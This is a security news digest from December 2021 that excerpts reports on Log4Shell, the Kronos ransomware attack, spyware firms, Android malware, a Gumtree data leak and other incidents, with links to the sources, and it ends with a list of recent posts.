December 17, 2021

Fortify Security Team
Dec 17, 2021

Title: Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Date Published: December 17, 2021

https://www.forcepoint.com/blog/x-labs/news-log4shell-pfizer-data-breach-hive-ransomware-gang

Excerpt: “The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download malware and execute malware that can run cryptocurrency mining software, release sensitive data, be part of a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.

Title: Sainsbury’s Payroll Hit by Kronos Attack
Date Published: December 17, 2021

https://www.bbc.com/news/technology-59683889

Excerpt: “A UKG official told BBC News: “UKG recently became aware of a ransomware incident that has disrupted the Kronos Private Cloud, which houses solutions used by a limited number of our customers.” It had taken immediate action to investigate and mitigate the issue, alerted affected customers and informed the authorities “We recognise the seriousness of the issue and have mobilised all available resources to support our customers and are working diligently to restore the affected services,” UKG added.”

Title: Facebook Exposes Mercenary Spy Firms That Targeted 50,000 People
Date Published: December 17, 2021

https://www.reuters.com/technology/facebook-exposes-mercenary-spy-firms-that-targeted-48000-people-2021-12-16/

Excerpt: “The company’s fight with the spy firms comes amid a wider move by American tech companies, U.S. lawmakers and President Joe Biden’s administration against purveyors of digital espionage services, notably the Israeli spyware company NSO Group, which was blacklisted earlier this month following weeks of revelations about how its technology was being deployed against civil society. Meta is already suing NSO in a U.S. court. Nathaniel Gleicher, Meta’s head of security policy, told Reuters that Thursday’s crackdown was meant to signal that “the surveillance-for-hire industry is much broader than one company”.”

Title: Backdoor Gives Hackers Complete Control over Federal Agency Network
Date Published: December 16, 2021

https://arstechnica.com/information-technology/2021/12/us-federal-agency-fails-to-respond-to-reports-it-has-been-backdoored/

Excerpt: “The backdoor works by replacing a normal Windows file named oci.dll with two malicious ones—one early in the attack and the other later on. The first imposter file implements WinDivert, a legitimate tool for capturing, modifying, or dropping network packets sent to or from the Windows network stack. The file allows the attackers to download and run malicious code on the infected system. Avast suspects the main purpose of the downloader is to bypass firewalls and network monitoring.”

Title: Google Unleashes Security ‘Fuzzer’ on log4shell Bug in Open-Source Software
Date Published: December 17, 2021

https://www.zdnet.com/article/google-unleashes-security-fuzzer-on-log4shell-bug-in-open-source-software/

Excerpt: “Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP and LDAPS. Disabling JNDI was previously a manual step to mitigate attacks against the original flaw. Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products.”

Title: Android Malware Warning: Over 500,000 Users Have Been Infected after Downloading This App from Google Play
Date Published: December 17, 2021

https://www.zdnet.com/article/over-half-a-million-users-been-infected-with-joker-malware-after-downloading-this-android-app-from-google-play/

Excerpt: “Once installed, the malware does three things: it simulates clicks in order to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers suggest there’s evidence that stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest that some users have noticed the unauthorised behaviour, with complaints about being charged for services they didn’t request access to.”

Title: Gumtree Classifieds Site Leaked Personal Info via the F12 Key
Date Published: December 16, 2021

https://www.bleepingcomputer.com/news/security/gumtree-classifieds-site-leaked-personal-info-via-the-f12-key/

Excerpt: “The consequences of having such data exposed are significant, as the leaked users could be targeted by phishing or social engineering attacks that use this information to try and harvest more sensitive information. The site also features an API exclusively used by the Gumtree app on iOS. Unfortunately, one of that API’s endpoints was vulnerable to an IDOR (insecure direct object references) attack, resulting in another leak of full names and other account info.”

Title: This Company Was Hit With Ransomware, but Didn’t Have to Pay Up. Here’s How They Did It
Date Published: December 17, 2021

https://www.zdnet.com/article/this-company-was-hit-with-ransomware-but-didnt-have-to-pay-up-heres-how-they-did-it/

Excerpt: “”I was pretty confident about the data side of things – we use Rubrik. We make sure it’s got multi-factor authentication (MFA) on it and doesn’t have any shared credentials, so it’s a walled garden,” says Day. “These people immediately want to go after your backups because that ratchets up pressure, so if they can’t get to your backups, you’re in a good place.” But this didn’t stop the cyber criminals from attempting to extort a ransom payment – they emailed all the staff at Langs, claiming they’d stolen data and threatened to sell it on the dark web if a payment wasn’t received by a particular date.”

Title: New Pseudomanuscrypt Malware Infected over 35,000 Computers in 2021
Date Published: December 17, 2021

https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html

Excerpt: “The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group’s attack toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign.” The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).”

Title: NSW Government Casual Recruiter Suffers Ransomware Hit
Date Published: December 16, 2021

https://www.zdnet.com/article/nsw-government-casual-recruiter-suffers-ransomware-hit/

Excerpt: “IT recruitment firm Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a “small subset” of the company’s data being downloaded and published on the dark web. The Finite Group incident response team confirmed with ZDNet that when the incident occurred, business operations were not disrupted. “Our security monitoring systems identified and closed down the threat quickly,” they said. “Since then, remedial works have been undertaken and the business has been fully operational”.”

Recent Posts

May 6, 2022

Title: Google Docs Crashes on Seeing "And. And. And. And. And." Date Published: May 6, 2022 https://www.bleepingcomputer.com/news/technology/google-docs-crashes-on-seeing-and-and-and-and-and/ Excerpt: “A bug in Google Docs is causing it to crash when a series of words...

May 5, 2022

Title: Tor Project Upgrades Network Speed Performance with New System Date Published: May 5, 2022 https://www.bleepingcomputer.com/news/security/tor-project-upgrades-network-speed-performance-with-new-system/ Excerpt: “The Tor Project has published details about a...

May 3, 2022

Title: Aruba and Avaya Network Switches are Vulnerable to RCE Attacks Date Published: May 3, 2022 https://www.bleepingcomputer.com/news/security/aruba-and-avaya-network-switches-are-vulnerable-to-rce-attacks/ Excerpt: “Security researchers have discovered five...

May 2, 2022

Title: U.S. DoD Tricked into Paying $23.5 Million to Phishing Actor Date Published: May 2, 2022 https://www.bleepingcomputer.com/news/security/us-dod-tricked-into-paying-235-million-to-phishing-actor/ Excerpt: “The U.S. Department of Justice (DoJ) has announced the...

April 29, 2022

Title: EmoCheck now Detects New 64-bit Versions of Emotet Malware Date Published: April 28, 2022 https://www.bleepingcomputer.com/news/security/emocheck-now-detects-new-64-bit-versions-of-emotet-malware/ Excerpt: “The Japan CERT has released a new version of their...

April 28, 2022

Title: New Bumblebee Malware Takes Over BazarLoader's Ransomware Delivery Date Published: April 28, 2022 https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-takes-over-bazarloaders-ransomware-delivery/ Excerpt: “A newly discovered malware loader...

April 27, 2022

Title: Chinese State-Backed Hackers now Target Russian State Officers Date Published: April 27, 2022 https://www.bleepingcomputer.com/news/security/chinese-state-backed-hackers-now-target-russian-state-officers/ Excerpt: “Security researchers analyzing a phishing...